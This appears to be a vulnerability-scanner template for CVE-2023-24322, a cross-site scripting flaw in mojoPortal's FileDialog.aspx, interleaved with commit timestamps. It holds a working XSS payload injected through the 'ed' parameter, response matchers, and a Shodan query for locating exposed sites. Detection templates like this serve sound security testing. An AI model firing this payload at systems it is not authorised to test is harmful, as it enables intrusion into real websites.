2023-02-20 13:20:07 +00:00
id : CVE-2023-24322
info :
2023-03-07 22:04:11 +00:00
name : mojoPortal 2.7.0.0 - Cross-Site Scripting
2023-02-20 13:20:07 +00:00
author : pikpikcu
severity : medium
2023-02-20 16:22:58 +00:00
description : |
2023-03-07 22:04:11 +00:00
mojoPortal 2.7.0.0 contains a cross-site scripting vulnerability in the FileDialog.aspx component, which can allow an attacker to execute arbitrary web scripts or HTML via a crafted payload injected into the ed and tbi parameters.
2023-02-20 13:20:07 +00:00
reference :
- https://github.com/blakduk/Advisories/blob/main/Mojoportal/README.md
2023-02-21 08:41:59 +00:00
- https://github.com/i7MEDIA/mojoportal/
- https://www.mojoportal.com/
2023-03-07 22:04:11 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2023-24322
2023-02-20 13:20:07 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
cwe-id : CWE-79
2023-03-02 21:07:26 +00:00
cve-id : CVE-2023-24322
2023-02-20 16:22:58 +00:00
metadata :
shodan-query : html:"mojoPortal"
2023-02-21 08:41:59 +00:00
verified : "true"
2023-02-20 13:20:07 +00:00
tags : cves,cve2023,mojoportal,xss
requests :
- method : GET
path :
2023-02-20 16:22:58 +00:00
- "{{BaseURL}}/Dialog/FileDialog.aspx?ed=foooooooooooooo%27);});});javascript:alert('document.domain');//g"
2023-02-20 13:20:07 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
2023-02-20 16:22:58 +00:00
- "javascript:alert('document.domain')"
- "File Browser"
2023-02-20 13:20:07 +00:00
condition : and
- type : word
part : header
words :
- "text/html"
2023-02-20 16:22:58 +00:00
- type : status
status :
- 200
2023-03-07 22:04:11 +00:00
# Enhanced by md on 2023/03/07